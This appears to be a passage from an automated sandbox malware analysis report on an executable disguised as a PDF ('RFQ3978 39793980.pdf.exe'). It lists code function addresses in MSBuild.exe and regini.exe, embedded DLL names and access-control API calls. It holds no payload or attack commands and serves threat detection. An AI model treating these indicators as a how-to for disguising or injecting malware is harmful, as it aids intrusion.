                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0040E2235_2_0040E223
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_004024E05_2_004024E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0040FEC35_2_0040FEC3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0042EEA35_2_0042EEA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0040FEBA5_2_0040FEBA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BA1185_2_011BA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011101005_2_01110100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A81585_2_011A8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E01AA5_2_011E01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D41A25_2_011D41A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D81CC5_2_011D81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B20005_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DA3525_2_011DA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E3F05_2_0112E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E03E65_2_011E03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C02745_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A02C05_2_011A02C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011205355_2_01120535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E05915_2_011E0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C44205_2_011C4420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D24465_2_011D2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CE4F65_2_011CE4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011447505_2_01144750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011207705_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111C7C05_2_0111C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113C6E05_2_0113C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011369625_2_01136962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011229A05_2_011229A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011EA9A65_2_011EA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011228405_2_01122840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112A8405_2_0112A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011068B85_2_011068B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E8F05_2_0114E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DAB405_2_011DAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D6BD75_2_011D6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111EA805_2_0111EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BCD1F5_2_011BCD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112AD005_2_0112AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01138DBF5_2_01138DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111ADE05_2_0111ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120C005_2_01120C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0CB55_2_011C0CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01110CF25_2_01110CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01140F305_2_01140F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C2F305_2_011C2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01162F285_2_01162F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01194F405_2_01194F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119EFA05_2_0119EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01112FC85_2_01112FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DEE265_2_011DEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120E595_2_01120E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01132E905_2_01132E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DCE935_2_011DCE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DEEDB5_2_011DEEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110F1725_2_0110F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011EB16B5_2_011EB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0115516C5_2_0115516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112B1B05_2_0112B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CF0CC5_2_011CF0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011270C05_2_011270C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D70E95_2_011D70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DF0E05_2_011DF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D132D5_2_011D132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110D34C5_2_0110D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0116739A5_2_0116739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011252A05_2_011252A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113B2C05_2_0113B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C12ED5_2_011C12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D75715_2_011D7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BD5B05_2_011BD5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E95C35_2_011E95C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DF43F5_2_011DF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011114605_2_01111460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DF7B05_2_011DF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011656305_2_01165630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D16CC5_2_011D16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B59105_2_011B5910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011299505_2_01129950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113B9505_2_0113B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118D8005_2_0118D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011238E05_2_011238E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DFB765_2_011DFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113FB805_2_0113FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01195BF05_2_01195BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0115DBF95_2_0115DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DFA495_2_011DFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D7A465_2_011D7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01193A6C5_2_01193A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01165AA05_2_01165AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BDAAC5_2_011BDAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C1AA35_2_011C1AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CDAC65_2_011CDAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D1D5A5_2_011D1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01123D405_2_01123D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D7D735_2_011D7D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113FDC05_2_0113FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01199C325_2_01199C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DFCF25_2_011DFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DFF095_2_011DFF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01121F925_2_01121F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DFFB15_2_011DFFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_010E3FD55_2_010E3FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_010E3FD25_2_010E3FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01129EB05_2_01129EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E002C07_2_02E002C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E202747_2_02E20274
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E403E67_2_02E403E6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D8E3F07_2_02D8E3F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E3A3527_2_02E3A352
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E120007_2_02E12000
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E381CC7_2_02E381CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E341A27_2_02E341A2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E401AA7_2_02E401AA
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E081587_2_02E08158
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D701007_2_02D70100
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E1A1187_2_02E1A118
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D9C6E07_2_02D9C6E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D7C7C07_2_02D7C7C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DA47507_2_02DA4750
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D807707_2_02D80770
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E2E4F67_2_02E2E4F6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E324467_2_02E32446
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E244207_2_02E24420
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E405917_2_02E40591
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D805357_2_02D80535
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D7EA807_2_02D7EA80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E36BD77_2_02E36BD7
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E3AB407_2_02E3AB40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DAE8F07_2_02DAE8F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D668B87_2_02D668B8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D8A8407_2_02D8A840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D828407_2_02D82840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E4A9A67_2_02E4A9A6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D829A07_2_02D829A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D969627_2_02D96962
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E3EEDB7_2_02E3EEDB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D92E907_2_02D92E90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E3CE937_2_02E3CE93
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D80E597_2_02D80E59
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E3EE267_2_02E3EE26
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D72FC87_2_02D72FC8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DFEFA07_2_02DFEFA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DF4F407_2_02DF4F40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E22F307_2_02E22F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DA0F307_2_02DA0F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DC2F287_2_02DC2F28
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D70CF27_2_02D70CF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E20CB57_2_02E20CB5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D80C007_2_02D80C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D7ADE07_2_02D7ADE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D98DBF7_2_02D98DBF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D8AD007_2_02D8AD00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E1CD1F7_2_02E1CD1F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E212ED7_2_02E212ED
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D9B2C07_2_02D9B2C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D9D2F07_2_02D9D2F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D852A07_2_02D852A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DC739A7_2_02DC739A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D6D34C7_2_02D6D34C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E3132D7_2_02E3132D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E3F0E07_2_02E3F0E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E370E97_2_02E370E9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D870C07_2_02D870C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E2F0CC7_2_02E2F0CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D8B1B07_2_02D8B1B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E4B16B7_2_02E4B16B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D6F1727_2_02D6F172
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DB516C7_2_02DB516C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E316CC7_2_02E316CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DC56307_2_02DC5630
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E3F7B07_2_02E3F7B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D714607_2_02D71460
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E3F43F7_2_02E3F43F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E495C37_2_02E495C3
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E1D5B07_2_02E1D5B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E375717_2_02E37571
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E2DAC67_2_02E2DAC6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E21AA37_2_02E21AA3
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E1DAAC7_2_02E1DAAC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DC5AA07_2_02DC5AA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E37A467_2_02E37A46
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E3FA497_2_02E3FA49
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DF3A6C7_2_02DF3A6C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DBDBF97_2_02DBDBF9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DF5BF07_2_02DF5BF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D9FB807_2_02D9FB80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E3FB767_2_02E3FB76
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D838E07_2_02D838E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DED8007_2_02DED800
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D899507_2_02D89950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D9B9507_2_02D9B950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E159107_2_02E15910
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D89EB07_2_02D89EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D43FD57_2_02D43FD5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D43FD27_2_02D43FD2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D81F927_2_02D81F92
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E3FFB17_2_02E3FFB1
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E3FF097_2_02E3FF09
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E3FCF27_2_02E3FCF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02DF9C327_2_02DF9C32
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D9FDC07_2_02D9FDC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E37D737_2_02E37D73
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D83D407_2_02D83D40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E31D5A7_2_02E31D5A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004B1C307_2_004B1C30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004ACAF77_2_004ACAF7
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004ACB007_2_004ACB00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004AAD107_2_004AAD10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004ACD207_2_004ACD20
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004AAE547_2_004AAE54
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004AAE607_2_004AAE60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004B52F07_2_004B52F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004B34E07_2_004B34E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004CBAE07_2_004CBAE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004B9C707_2_004B9C70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B1E2887_2_02B1E288
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B2523C7_2_02B2523C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B1E3A37_2_02B1E3A3
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B1E73C7_2_02B1E73C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B1E50B7_2_02B1E50B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B1E8C27_2_02B1E8C2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B1D8087_2_02B1D808
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0119F290 appears 103 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 01167E54 appears 110 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0110B970 appears 280 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 01155130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0118EA12 appears 86 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02DB5130 appears 58 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02D6B970 appears 262 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02DEEA12 appears 86 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02DC7E54 appears 107 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02DFF290 appears 103 times
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2083511223.000000000A120000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs RFQ3978 39793980.pdf.exe
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081239429.0000000004F10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs RFQ3978 39793980.pdf.exe
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2077632944.0000000003F84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs RFQ3978 39793980.pdf.exe
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2077632944.0000000003764000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs RFQ3978 39793980.pdf.exe
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2076558141.000000000094E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ3978 39793980.pdf.exe
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000000.1695871540.0000000000402000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXliF.exe, vs RFQ3978 39793980.pdf.exe
                Source: RFQ3978 39793980.pdf.exeBinary or memory string: OriginalFilenameXliF.exe, vs RFQ3978 39793980.pdf.exe
                Source: RFQ3978 39793980.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: RFQ3978 39793980.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, TaskParameter.csTask registration methods: 'CreateNewTaskItemFrom'
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, OutOfProcTaskHostNode.csTask registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, TaskLoader.csTask registration methods: 'CreateTask'
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, RegisteredTaskObjectCacheBase.csTask registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, IJ6UC68YOxsykVHtee.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 7.2.regini.exe.27cda98.0.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 7.2.regini.exe.27cda98.0.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, IJ6UC68YOxsykVHtee.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 8.2.shazRxxmQwU.exe.317cd14.1.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 8.2.shazRxxmQwU.exe.317cd14.1.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, hu0NnvCl5pXqnShn53.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, hu0NnvCl5pXqnShn53.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, hu0NnvCl5pXqnShn53.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, hu0NnvCl5pXqnShn53.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, hu0NnvCl5pXqnShn53.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, hu0NnvCl5pXqnShn53.csSecurity API names: _0020.AddAccessRule
